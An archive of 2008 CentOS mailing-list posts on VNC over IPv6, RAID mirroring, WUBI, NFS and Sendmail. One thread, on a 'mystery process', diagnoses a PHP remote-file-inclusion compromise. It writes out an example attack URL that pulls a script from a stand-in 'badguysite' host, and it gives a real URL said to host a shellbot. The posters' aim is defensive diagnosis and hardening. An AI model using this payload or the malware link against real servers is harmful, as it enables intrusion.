<[EMAIL PROTECTED] > wrote:



On Fri, Aug 8, 2008 at 3:55 PM, Robert Moskowitz
<[EMAIL PROTECTED] 
>> wrote:

   http://www.realvnc.com/products/enterprise/4.1/ipv6.html


 IPv6 support in VNC Server E4.1.7/P4.1.2

   VNC Server E4.1.7 & P4.1.2 are fully IPv6-aware, but is shipped
   with IPv6 support disabled by default, for security
reasons. IPv6
   can be enabled by setting "InTransports=IPv6,IPv4" (the default
   being IPv4 only), either on the command-line when starting
   vncserver under Unix

   Ok.  we have vnc-server-4.1.2-9.el5.i386.rpm, so it SHOULD
support
   IPv6.

   Don't know how to add a setting to the command-line, as I rund
   VNCserver via the service command, but I added it to
   /etc/sysconfig/vncservers:

   InTransports="IPv6"   (note I also tried without the quotes)

   and netstat -na|grep 5902

   shows vncserver only running on IPv4 and I can only connect
to it
   via IPv4.

   So what am I missing?


Rob Lockhart wrote:

In /etc/sysconfig/vncservers I have something like this:

VNCSERVERS="1:myusername"
VNCSERVERARGS[1]="-geometry 1400x1050 -depth 16 -localhost"

(so I can only use localhost, which means I only allow
connections over ssh or from the local machine).

Yours might be something like this:

VNCSERVERS="1:robert"
VNCSERVERARGS[1]="-geometry 1400x1050 -depth 16
InTransports=IPv6,IPv4"


Well first my line has [2].  I changed that to [1] and tried all
sorts of variants to the above, including putting a - infront of
InTransports (like other options), and replacing the = with a
space.  No listening on IPv6.

I have foudn the RealVNC support mailing list and sent a question
there, hopefully to get answers.  But if anyone has anything to
suggest here, please do.



Robert,

I recently reinstalled VNC - actually "TightVNC" as it's better than 
VNC for bandwidth.  If you type "Xvnc -h" you'll see all the 
parameters supported.  I didn't see any options for IPv6 in my 
version.  But yours might indeed have more options.


I noticed that the default /etc/init.d/vncserver script seemed to be 
ignoring my parameters for VNCSERVERARGS as in the log file, it showed 
listening for all hosts (not just local hosts).  This was confirmed by 
connecting directly from another machine to the VNC server port (:1 
which is port 5901).  I had an older version of the vncserver script, 
and I overwrote the one from the repository with that one, and it took 
my parameters.  However, the parameters I can confirm are working 
are:  "-nolisten tcp -localhost -desktop RobHome -geometry 1280x1024".




Dah, log file...

First I stared at the vncserver script.  I am not a script writer, but I 
figured out what VNCSERVERARGS has the [1] after it.  That is for the 
ARGS for screen :1!  So if I use 2, the I need [2], dah.  So I did that 
and NO listening for port 5902.  I went and read the log and found that 
intransport is NOT a valid option


So now I either go to a different remote console that does support IPv6, 
or get the Personal version from RealVNC.  Interestingly, vncviewer IS 
trying to connect over IPv6 it is sending TCPv6 SYNs out and getting 
resetted.



___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Re: gcc editor for newbie (Emacs or vim or ?)

[Florin Andrei]

MHR wrote:


Vi is not the world's best editor


Heh, understatement of the century.
It's an awful editor. I wish I could hire the person who came up with 
the user interface, only to have the satisfaction of having him/her 
fired five minutes later. With no severance package.


It's one of the worst designs from a usability perspective. Yes, it's on 
every Unix system out there. Yes, it's very complex and can be powerful 
and can be extended to do a million things. Yes, you can train yourself 
so you learn it well enough so that the interface is not a problem anymore.
But all that does not negate the basic fact that it's one of the most 
un-intuitive and essentially broken user interface designs ever. But 
we're stuck with it, which is unfortunate.


Note: I'm not an Emacs fan. :-)

--
Florin Andrei

http://florin.myip.org/
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[Jeff Kinz]

On Tue, Aug 12, 2008 at 12:28:08PM -0400, sbeam wrote:
> On Tuesday 12 August 2008 12:18, Rainer Duffner wrote:
> > (I think it requires both register_globals and allow_url_fopen to be on,
> > but I'm not sure if you can't get it to work with only allow_url_fopen)
> 
> as I just found out, it can, as long as the PHP developer was even more naive 
> than usual. The offending line was:
> 
> require_once($_SERVER['DOCUMENT_ROOT']."/db.inc.php");
> 
> then a request like:
> 
> http://victim.com/index.php?_SERVER[DOCUMENT_ROOT]=http://badguysit
> e.es/bot.txt
> 
> will do a fopen() for "http://badguysite.es/bot.txt/db.inc.php";, which is 
> good 
> enough.
> 
> And yeah this works with register_globals off, which surprised me. And also 
> surprised that mod_security has no problem with that URL. I am going to raise 
> the issue with them.

Hi Sam, Nice job tracking that down, and evenm nicer, explaining it with an 
example even. 

If you don't mind I would like to use it as a real world example for a
class I'm teaching?  I will remove all the identifying information
first of course.

Thanks, 
Jeff Kinz
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

RE: [CentOS] gcc editor for newbie (Emacs or vim or ?)

[Bowie Bailey]

Lanny Marcus wrote:
> 
> Thank you! gvim is slick. As you wrote, it has lots of help
> and it will be easy to learn how to use vi, by learning on gvim.
> Better than holding a cheat sheet or having a book open, trying
> to figure out what to do, when learning.

There is a nice vi cheatsheet available here:

http://downloads.techrepublic.com.com/abstract.aspx?docid=172404

The help in gvim is nice, but a good cheatsheet is more convenient when
you are just looking for a simple command.

-- 
Bowie
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[sbeam]

On Tuesday 12 August 2008 12:18, Rainer Duffner wrote:
> (I think it requires both register_globals and allow_url_fopen to be on,
> but I'm not sure if you can't get it to work with only allow_url_fopen)

as I just found out, it can, as long as the PHP developer was even more naive 
than usual. The offending line was:

require_once($_SERVER['DOCUMENT_ROOT']."/db.inc.php");

then a request like:

http://victim.com/index.php?_SERVER[DOCUMENT_ROOT]=http://badguysit
e.es/bot.txt

will do a fopen() for "http://badguysite.es/bot.txt/db.inc.php";, which is good 
enough.

And yeah this works with register_globals off, which surprised me. And also 
surprised that mod_security has no problem with that URL. I am going to raise 
the issue with them.

cheers
Sam

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Mirroring Hard Drive

[Robert]

Robert wrote:



Paul R. Ganci wrote:

Matt wrote:

why not just put it in the machine and make it a raid1
mirror

then, if the first one dies, you just use the second one :D


How do you do that?
  

Detailed step by step instructions easily modified for CentOS:

http://www.howtoforge.com/software-raid1-grub-boot-debian-etch

I haven't tried this myself ... yet but plan on it in the next few 
weeks.


I haven't tried it either...yet... but there is also a version of the 
HOWTO for Fedora 8, which might require less interpolation. 
http://www.howtoforge.com/software-raid1-grub-boot-fedora-8


Thanks for the URL
I should have had the common decency to report that I *did* try this 
howto and *was* successful. There were a couple things that caused some 
head-scratching.


1. I read somewhere that it's safest to resize the filesystems on the 
existing drive before doing anything else, to allow for a 4K superblock 
beginning on a 64k boundary at the end of the partition. I did that. 
(Straightforward instructions at 
http://lists.centos.org/pipermail/centos/2006-April/063687.html)


2. In part 2, page 7, there is a step "Next replace LABEL=/boot with 
/dev/md0 and LABEL=/ with /dev/md2 in /etc/mtab" that I kinda 
questioned.  It was my understanding that /etc/mtab is maintained by the 
mount command. (From man mount: "The programs mount and umount maintain 
a list of currently mounted file systems in  the  file /etc/mtab".)  
This makes the command on page 9, "cp -dpRx / /mnt/md2" *appear* to be 
copying md2 to itself. Confusion aside, the command has the desired result.


Aside from those 2 points, it went very smoothly.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[Rainer Duffner]

sbeam schrieb:

On Tuesday 12 August 2008 10:16, Rainer Duffner wrote:
  

Anything in /tmp ?

Disable register_globals and allow_url_fopen.
Set open_basedir for any virtual hosts to the absolute minimum.



I have mod_security installed now, but I tested a similar attack, and sadly, 
it still succeeds as long as allow_url_fopen is on. But this is not CentOS 
related.
  



Yeah, because allow_url_fopen basically means "I want to run code from 
some random site", in most cases.
E.g., when they have implemented a crappy starting-page "index.php" 
where there is a menu that calls index.php?link=file1.html

if item one was clicked.
Too bad people can use that to get 
index.php?link=http://some.geocities.page/foo.gif executed as PHP on 
your server!
(I think it requires both register_globals and allow_url_fopen to be on, 
but I'm not sure if you can't get it to work with only allow_url_fopen)




cheers,
Rainer
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[sbeam]

On Tuesday 12 August 2008 10:16, Rainer Duffner wrote:
> Anything in /tmp ?
>
> Disable register_globals and allow_url_fopen.
> Set open_basedir for any virtual hosts to the absolute minimum.

allow_url_fopen was enabled on one of many sites. A developer put in an unsafe 
php include(). This allowed the w0rm to run a remote PHP script which used 
exec() to fetch and spawn the shellbot. Pretty standard. But it also did a 
decent job of removing itself from the filesystem. Lucky I noticed the weird 
process this morning, no harm done it seems.

I have mod_security installed now, but I tested a similar attack, and sadly, 
it still succeeds as long as allow_url_fopen is on. But this is not CentOS 
related.

cheers
Sam
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] vncserver on IPv6

[Robert Moskowitz]

Rob Lockhart wrote:
On Mon, Aug 11, 2008 at 12:01 PM, Robert Moskowitz 
<[EMAIL PROTECTED] > wrote:



On Fri, Aug 8, 2008 at 3:55 PM, Robert Moskowitz
<[EMAIL PROTECTED] 
>> wrote:

   http://www.realvnc.com/products/enterprise/4.1/ipv6.html


 IPv6 support in VNC Server E4.1.7/P4.1.2

   VNC Server E4.1.7 & P4.1.2 are fully IPv6-aware, but is shipped
   with IPv6 support disabled by default, for security
reasons. IPv6
   can be enabled by setting "InTransports=IPv6,IPv4" (the default
   being IPv4 only), either on the command-line when starting
   vncserver under Unix

   Ok.  we have vnc-server-4.1.2-9.el5.i386.rpm, so it SHOULD
support
   IPv6.

   Don't know how to add a setting to the command-line, as I rund
   VNCserver via the service command, but I added it to
   /etc/sysconfig/vncservers:

   InTransports="IPv6"   (note I also tried without the quotes)

   and netstat -na|grep 5902

   shows vncserver only running on IPv4 and I can only connect
to it
   via IPv4.

   So what am I missing?


Rob Lockhart wrote:

In /etc/sysconfig/vncservers I have something like this:

VNCSERVERS="1:myusername"
VNCSERVERARGS[1]="-geometry 1400x1050 -depth 16 -localhost"

(so I can only use localhost, which means I only allow
connections over ssh or from the local machine).

Yours might be something like this:

VNCSERVERS="1:robert"
VNCSERVERARGS[1]="-geometry 1400x1050 -depth 16
InTransports=IPv6,IPv4"


Well first my line has [2].  I changed that to [1] and tried all
sorts of variants to the above, including putting a - infront of
InTransports (like other options), and replacing the = with a
space.  No listening on IPv6.

I have foudn the RealVNC support mailing list and sent a question
there, hopefully to get answers.  But if anyone has anything to
suggest here, please do.



Robert,

I recently reinstalled VNC - actually "TightVNC" as it's better than 
VNC for bandwidth.  If you type "Xvnc -h" you'll see all the 
parameters supported.  I didn't see any options for IPv6 in my 
version.  But yours might indeed have more options.
Using this method, I don't either, though the help is -help, not -h, but 
there is -multicast for IPv6 multicast for XDMCP


I noticed that the default /etc/init.d/vncserver script seemed to be 
ignoring my parameters for VNCSERVERARGS as in the log file, it showed 
listening for all hosts (not just local hosts).  This was confirmed by 
connecting directly from another machine to the VNC server port (:1 
which is port 5901).  I had an older version of the vncserver script, 
and I overwrote the one from the repository with that one, and it took 
my parameters.  However, the parameters I can confirm are working 
are:  "-nolisten tcp -localhost -desktop RobHome -geometry 1280x1024".


First, verify via "Xvnc -h" that the parmeters for IPv6 are supported 
(InTransports).
BTW, I note in the -help messages that parameters are case insensitive.  
Or that is the claim.
  Next, could it be possible the ip6tables is blocking you?  My 
network doesn't use IPv6 so I don't think I could retrace your steps.
No.  Port 5902 is specifically accepted in both iptables and ip6tables.  
And I have tested this using another app that I have bound to that port 
(but is not running when I try out vncserver).


And no answer on the vnc support list


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[Karanbir Singh]

Ned Slider wrote:
I agree - I think that whilst features like this may be appealing to the 
goals of Ubuntu, they do not necessarily match the goals of the CentOS 
project.


How'd you work that out ?

JMHO, but I would think other stuff like a ServerCD (or rebuilding 
FastTrack packages) would be higher on the project's list of priorities.


That quite an irrelevant comparison, each of those is an orthogonal issue.

- KB
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Suggestion on Network Management software with troubleticket system

[Paul Heinlein]

On Mon, 11 Aug 2008, nate wrote:

I'm looking for a network management software. And as the network 
grows it clearly becomes that manual notes is getting too tedious. 
Also an integrated troube ticketing systemm would be great. Any 
reference is really appreciated.


For managing my "network" of servers(assuming what you mean since 
your posting to a CentOS list and not a network equipment list), I 
use CFengine to manage them(www.cfengine.org). Puppet(t?) is also 
increasing in popularity as well(don't know the web site and doing a 
google search didn't come up with anything obvious).


I'll second cfengine (available via rpmforge). It takes a while to 
set up, but it's a pretty sane way to manage configurations.



For a ticketing system I suggest Request Tracker(RT)
(http://www.bestpractical.com/rt).

For documentation I highly recommend confluence
(http://www.atlassian.com/software/confluence/).


RT is good; I've used it at previous jobs. Be prepared to install a 
lot of Perl modules. :-)


In my current small-ish setting, I use Trac for tickets and 
documentation. I keep most configuration files in a Subversion 
repository (an export of which serves as the depot for cfengine) -- 
and Trac makes it easy to link between wiki pages, tickets, and 
repository revisions.


I don't think this setup would scale to a large organization, but it 
works just fine in smaller environments.



For monitoring I use a combination of an extremely customized
cacti[collects 10+ million points a day](www.cacti.net) and
Nagios(www.nagios.org).


Nagios, like cfengine, takes a while to get started, but does the job 
once it's up and running. Wolfgang Barth's book from No Starch Press 
can be handy to have around if you want an accessible introduction and 
reference.


--
Paul Heinlein <> [EMAIL PROTECTED] <> http://www.madboa.com/
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[Ned Slider]

Ralph Angenendt wrote:

Ned Slider wrote:

Sven wrote:

On 8/12/08, Karanbir Singh <[EMAIL PROTECTED]> wrote:

 Now the question: is there anyway to get something similar for CentOS ? or
is there a process that someone might follow to achieve the same or similar
result ?

I am just curious. What is the use case for Wubi based installation of
CentOS? IMHO is the CentOS installation process (also the Ubuntu one)
very user friendly. The problem for most Windows users is the
operation and daily use of Linux. They don't wish to use command line
and miss their favorite software (Dreamweaver, Photoshop, etc).
I agree - I think that whilst features like this may be appealing to the  
goals of Ubuntu, they do not necessarily match the goals of the CentOS  
project. Anyone capable of installing that other popular OS should not  
have any problems with the CentOS installer. New users tend to struggle  
more with the concepts of disk partitioning, freeing space for the  
installation (if performing a dual boot install which is presumably the  
target audience for such an installer) and generally using the software  
once installed. I think anyone that *needs* a WUBI-type installer is  
going to struggle to configure and use CentOS once installed.


I think you both are missing the point: Wubi is *not* about installing
CentOS (or rather Ubuntu) from Windows, it is installing the linux
system *under* Windows into a disk image and then starting from that
disk image out of the windows boot manager. No partitioning required and
if you want to remove your linux, you just remove the two disk images it
creates (and the boot entry).



Right, thanks Ralph for the clarification.



JMHO, but I would think other stuff like a ServerCD (or rebuilding  
FastTrack packages) would be higher on the project's list of priorities.


Same here.

Ralph


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[Ralph Angenendt]

Ned Slider wrote:
> Sven wrote:
>> On 8/12/08, Karanbir Singh <[EMAIL PROTECTED]> wrote:
>>>  Now the question: is there anyway to get something similar for CentOS ? or
>>> is there a process that someone might follow to achieve the same or similar
>>> result ?
>>
>> I am just curious. What is the use case for Wubi based installation of
>> CentOS? IMHO is the CentOS installation process (also the Ubuntu one)
>> very user friendly. The problem for most Windows users is the
>> operation and daily use of Linux. They don't wish to use command line
>> and miss their favorite software (Dreamweaver, Photoshop, etc).
>
> I agree - I think that whilst features like this may be appealing to the  
> goals of Ubuntu, they do not necessarily match the goals of the CentOS  
> project. Anyone capable of installing that other popular OS should not  
> have any problems with the CentOS installer. New users tend to struggle  
> more with the concepts of disk partitioning, freeing space for the  
> installation (if performing a dual boot install which is presumably the  
> target audience for such an installer) and generally using the software  
> once installed. I think anyone that *needs* a WUBI-type installer is  
> going to struggle to configure and use CentOS once installed.

I think you both are missing the point: Wubi is *not* about installing
CentOS (or rather Ubuntu) from Windows, it is installing the linux
system *under* Windows into a disk image and then starting from that
disk image out of the windows boot manager. No partitioning required and
if you want to remove your linux, you just remove the two disk images it
creates (and the boot entry).

Kind of like the old SuSE installs into DOS partitions (with syslinux). 

> JMHO, but I would think other stuff like a ServerCD (or rebuilding  
> FastTrack packages) would be higher on the project's list of priorities.

Same here.

Ralph


pgpWEU3MjwtZi.pgp
Description: PGP signature
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[Rainer Duffner]

sbeam schrieb:


On Tuesday 12 August 2008 09:08, Mr Shunz wrote:
  

maybe you should check with "lsof -p 3041" and see which files/pipes it
uses to have a clue.



of course! 

it's a perl w0rm that was uploaded last night, now killed. Now to determine 
how it got in.


I found some output in the main apache error log that looks like wget was used 
to download a shellbot. But I can't figure out how wget was called, may be 
some PHP exec() call that is unchecked. 
  



Anything in /tmp ?

Disable register_globals and allow_url_fopen.
Set open_basedir for any virtual hosts to the absolute minimum.

That will help a bit.




But I can't find it on the system yet or the data files it uses.

chkrootkit says all is clear.

mod_security is now being installed, belatedly. This server has only been up 1 
week, sheesh.


thanks
Sam

  



It was most likely executed via a remote server. Look for URLs in the 
logs that fetch stuff from remote servers.




cheers,
Rainer
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[sbeam]

On Tuesday 12 August 2008 09:08, Mr Shunz wrote:
> maybe you should check with "lsof -p 3041" and see which files/pipes it
> uses to have a clue.

of course! 

it's a perl w0rm that was uploaded last night, now killed. Now to determine 
how it got in.

I found some output in the main apache error log that looks like wget was used 
to download a shellbot. But I can't figure out how wget was called, may be 
some PHP exec() call that is unchecked. 

But I can't find it on the system yet or the data files it uses.

chkrootkit says all is clear.

mod_security is now being installed, belatedly. This server has only been up 1 
week, sheesh.

thanks
Sam



PS here is the link to the shellbot that was used, in case anyone is curious. 
I break up the URL to protect the innocent:

http://usuarios.lycos.es/w0rms/info.txt

have searched it and don't find anything special on the main security sites. 
Is it new?
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] Sendmail is not putting the full information in the received header anymore

[Jason Pyeron]

Previously, when our server received an email it would slap the rcpt to in the
received headers by adding a for <...> any ideas what has changed?

Any pointers would be grateful.


Headers received today:

Return-Path: <[EMAIL PROTECTED]>
Received: from psmtp.com (exprod8mx220.postini.com [64.18.3.120])
by mail.pdinc.us (8.12.11.20060308/8.12.11) with SMTP id m7CCwh6o006066;
Tue, 12 Aug 2008 08:58:44 -0400
Received: from source ([198.185.182.20]) (using TLSv1) by
exprod8mx220.postini.com ([64.18.7.10]) with SMTP;
Tue, 12 Aug 2008 05:58:42 PDT
Received: from hq-exout01.anteon.com ([10.170.1.216])
  by hq-ipt01.anteon.com with ESMTP; 12 Aug 2008 08:58:16 -0400
X-SENDER-IP: 10.170.1.216
X-SENDER-REPUTATION: None
X-IronPort-AV: i="4.32,195,1217822400"; 
   d="pdf'?doc'32?xls'32,32?zip'32,32,48?scan'32,32,48,208,217,32,48";
a="236730957:sNHT2674851018"
Received: from HQ-EXVS05.anteon.com ([10.170.1.146]) by HQ-EXOUT01.anteon.com
with Microsoft SMTPSVC(6.0.3790.3959);
 Tue, 12 Aug 2008 08:58:16 -0400
x-mimeole: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="_=_NextPart_001_01C8FC7B.15CE4044"
Subject: SEAPORT E, RFP, Calibration Standards Management Support , Navy-FISC,
Corona, CA, New - Incumbent Known, Due Date: 8/22/2008 6:00:00 PM,
N00024-08-R-3381
Date: Tue, 12 Aug 2008 08:58:14 -0400
Message-ID: <[EMAIL PROTECTED]>
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator: 
Thread-Topic: SEAPORT E, RFP, Calibration Standards Management Support ,
Navy-FISC, Corona, CA, New - Incumbent Known, Due Date: 8/22/2008 6:00:00 PM,
N00024-08-R-3381
Thread-Index: Acj8exTmRKNp5IQVQnS543hWImbznw==
From: "Hopwood, Geoff" <[EMAIL PROTECTED]>
Bcc:
X-OriginalArrivalTime: 12 Aug 2008 12:58:16.0577 (UTC)
FILETIME=[1652EF10:01C8FC7B]
X-pstn-neptune: 1/1/1.00/92
X-pstn-levels: (S:99.9/99.9 CV: 0.0940 P:95.9108 )
X-pstn-settings: 1 (0.1500:0.1500) CV gt3 gt2 gt1 p 
X-pstn-addresses: from <[EMAIL PROTECTED]> [125/4] 
X-pstn-cave-hit: 


Headers received 2 years ago:

Received: from wrtlnx07.wrtech.com (wrtlnx07.wrtech.com [207.14.178.213])
by ns.pyerotechnics.com (8.11.6/8.11.6) with ESMTP id k7L8u4921189
for <[EMAIL PROTECTED]>; Mon, 21 Aug 2006 04:56:05 -0400


--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-   -
- Jason Pyeron  PD Inc. http://www.pdinc.us -
- Principal Consultant  10 West 24th Street #100-
- +1 (443) 269-1555 x333Baltimore, Maryland 21218   -
-   -
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This message is copyright PD Inc, subject to license 20080407P00.

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[Ned Slider]

Sven wrote:

On 8/12/08, Karanbir Singh <[EMAIL PROTECTED]> wrote:

 Hi,


Hi Karanbir

[...]


 Now the question: is there anyway to get something similar for CentOS ? or
is there a process that someone might follow to achieve the same or similar
result ?


I am just curious. What is the use case for Wubi based installation of
CentOS? IMHO is the CentOS installation process (also the Ubuntu one)
very user friendly. The problem for most Windows users is the
operation and daily use of Linux. They don't wish to use command line
and miss their favorite software (Dreamweaver, Photoshop, etc).



I agree - I think that whilst features like this may be appealing to the 
goals of Ubuntu, they do not necessarily match the goals of the CentOS 
project. Anyone capable of installing that other popular OS should not 
have any problems with the CentOS installer. New users tend to struggle 
more with the concepts of disk partitioning, freeing space for the 
installation (if performing a dual boot install which is presumably the 
target audience for such an installer) and generally using the software 
once installed. I think anyone that *needs* a WUBI-type installer is 
going to struggle to configure and use CentOS once installed.


JMHO, but I would think other stuff like a ServerCD (or rebuilding 
FastTrack packages) would be higher on the project's list of priorities.


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] Centos 5.2, Firefox 3, and IPv6

[Karanbir Singh]

Robert Moskowitz wrote:
I am doing some testing and it almost seems as if Firefox 3.0.1 that 
comes with Centos 5.2 is NOT working with IPv6.


my home network is 100% ipv6 and firefox works fine :D
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] mystery process "unit"

[Mr Shunz]

Hi,

> Ok, dumb question. On a certain LAMP server I am seeing in 'ps auxf' a process
> called "unit" with no arguments or other path info. It has a fairly low pid,
> 3041, indicating it might have been started soon after reboot (last week).
> but ps says it was started yesterday,

can't find it in any of my centos nor debian machines, even a "locate
unit" finds
nothing!

maybe you should check with "lsof -p 3041" and see which files/pipes it uses to
have a clue.

cheers

-- 

Daniele Santi .o.
[EMAIL PROTECTED] ..o () ascii ribbon campaign
Linux User #415108 ooo /\ www.asciiribbon.org

___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] mystery process "unit"

[sbeam]

Ok, dumb question. On a certain LAMP server I am seeing in 'ps auxf' a process 
called "unit" with no arguments or other path info. It has a fairly low pid, 
3041, indicating it might have been started soon after reboot (last week). 
but ps says it was started yesterday,

I don't see it on any of 3 other CentOS machines. It is hard to google for 
such a generic name. So does anyone either know what it is, or how I can find 
out more about it?

Sam
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] WUBI like process for CentOS ?

[Sven]

On 8/12/08, Karanbir Singh <[EMAIL PROTECTED]> wrote:
>
>  Hi,

Hi Karanbir

[...]

>  Now the question: is there anyway to get something similar for CentOS ? or
> is there a process that someone might follow to achieve the same or similar
> result ?

I am just curious. What is the use case for Wubi based installation of
CentOS? IMHO is the CentOS installation process (also the Ubuntu one)
very user friendly. The problem for most Windows users is the
operation and daily use of Linux. They don't wish to use command line
and miss their favorite software (Dreamweaver, Photoshop, etc).

regards
Sven
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] SCO 7.1 on full virtualization mode

[Rainer Duffner]

lingu schrieb:

Hi,

  I am trying to install  SCO 7.1 on Centos 5.2 in full virtualization 
mode.



That's the strangest thing I've seen in a while, I must admit.


But the installation requires booting from a floppy drive provide in 
the SCO CD.


I tried different ways to attach floppy drive to the guest.I even 
tried providing floppy image as a drive to the guest but guest is not 
booting from floppy.


 It will be more helpful if any one help me to get this installed .



I  guess it wants to access the hardware directly, which might be a 
problem in a Xen environment.


Try VMware (workstation or server) to see if it makes any difference.



cheers,
Rainer


___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] learning centos

[Akemi Yagi]

On Tue, Aug 12, 2008 at 5:11 AM, pedro henrique antunes de oliveira
<[EMAIL PROTECTED]> wrote:
> Hello, I'm new to CENTOS and I'd like to learn how to use it from ground up.
>
> Can anyone recommend me books on it?
>
> I already have the documentation from the web site, can I start with it?
>
> I've already done very basic stuff on archlinux and slackware.

Take a look at #4 of
http://www.centos.org/modules/newbb/viewtopic.php?topic_id=14273&forum=47
(for example)

Akemi
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] NFS issues

[Johan Swensson]

So I'm running nfs to get content to my web servers. Now I've had this 
problem 2 times (about 2 weeks since the last occurrence).

I use drbd on the nfs server for redundancy. Now to my problem:

All my web sites stopped responding so I started by checking dmesg and 
there I found a bunch of this errors

||

Aug 11 16:00:39 web03 kernel: lockd: server 192.168.20.22 not responding, timed 
out
Aug 11 16:02:39 web03 kernel: lockd: server 192.168.20.22 not responding, timed 
out


But when checking the nfs server lockd was running and I could access 
all the files from the webserver with ls, cd etc.


The logs on the nfs server doesn't say anything of interest and checking 
apaches error_log just says "not found or unable to stat".


Now I mentioned this have happened 2 times and both these times I've 
"solved" it by rebooting the nfs server and web servers. This isn't a 
good solution to have to reboot my servers every couple of weeks so I 
really could use some help. :)


Also I get this from time to time on the web servers, dunno if it's related.
/do_vfs_lock: VFS is out of sync with lock manager! /
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] vncserver on IPv6

[Rob Lockhart]

On Mon, Aug 11, 2008 at 12:01 PM, Robert Moskowitz <[EMAIL PROTECTED]>wrote:

>
> On Fri, Aug 8, 2008 at 3:55 PM, Robert Moskowitz <[EMAIL PROTECTED]> [EMAIL PROTECTED]>> wrote:
>>
>>http://www.realvnc.com/products/enterprise/4.1/ipv6.html
>>
>>
>>  IPv6 support in VNC Server E4.1.7/P4.1.2
>>
>>VNC Server E4.1.7 & P4.1.2 are fully IPv6-aware, but is shipped
>>with IPv6 support disabled by default, for security reasons. IPv6
>>can be enabled by setting "InTransports=IPv6,IPv4" (the default
>>being IPv4 only), either on the command-line when starting
>>vncserver under Unix
>>
>>Ok.  we have vnc-server-4.1.2-9.el5.i386.rpm, so it SHOULD support
>>IPv6.
>>
>>Don't know how to add a setting to the command-line, as I rund
>>VNCserver via the service command, but I added it to
>>/etc/sysconfig/vncservers:
>>
>>InTransports="IPv6"   (note I also tried without the quotes)
>>
>>and netstat -na|grep 5902
>>
>>shows vncserver only running on IPv4 and I can only connect to it
>>via IPv4.
>>
>>So what am I missing?
>>
>>
> Rob Lockhart wrote:
>
>  In /etc/sysconfig/vncservers I have something like this:
>>
>> VNCSERVERS="1:myusername"
>> VNCSERVERARGS[1]="-geometry 1400x1050 -depth 16 -localhost"
>>
>> (so I can only use localhost, which means I only allow connections over
>> ssh or from the local machine).
>>
>> Yours might be something like this:
>>
>> VNCSERVERS="1:robert"
>> VNCSERVERARGS[1]="-geometry 1400x1050 -depth 16 InTransports=IPv6,IPv4"
>>
>>
> Well first my line has [2].  I changed that to [1] and tried all sorts of
> variants to the above, including putting a - infront of InTransports (like
> other options), and replacing the = with a space.  No listening on IPv6.
>
> I have foudn the RealVNC support mailing list and sent a question there,
> hopefully to get answers.  But if anyone has anything to suggest here,
> please do.
>
>
>
Robert,

I recently reinstalled VNC - actually "TightVNC" as it's better than VNC for
bandwidth.  If you type "Xvnc -h" you'll see all the parameters supported.
I didn't see any options for IPv6 in my version.  But yours might indeed
have more options.

I noticed that the default /etc/init.d/vncserver script seemed to be
ignoring my parameters for VNCSERVERARGS as in the log file, it showed
listening for all hosts (not just local hosts).  This was confirmed by
connecting directly from another machine to the VNC server port (:1 which is
port 5901).  I had an older version of the vncserver script, and I overwrote
the one from the repository with that one, and it took my parameters.
However, the parameters I can confirm are working are:  "-nolisten tcp
-localhost -desktop RobHome -geometry 1280x1024".

First, verify via "Xvnc -h" that the parmeters for IPv6 are supported
(InTransports).  Next, could it be possible the ip6tables is blocking you?
My network doesn't use IPv6 so I don't think I could retrace your steps.
Indeed, you are right in that I had omitted a "-" in my email, but didn't
want to waste list bandwidth in sending out the obvious typo.

Regards,
  -Rob
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos

[CentOS] learning centos

[pedro henrique antunes de oliveira]

Hello, I'm new to CENTOS and I'd like to learn how to use it from ground up.

Can anyone recommend me books on it?

I already have the documentation from the web site, can I start with it?

I've already done very basic stuff on archlinux and slackware.
___
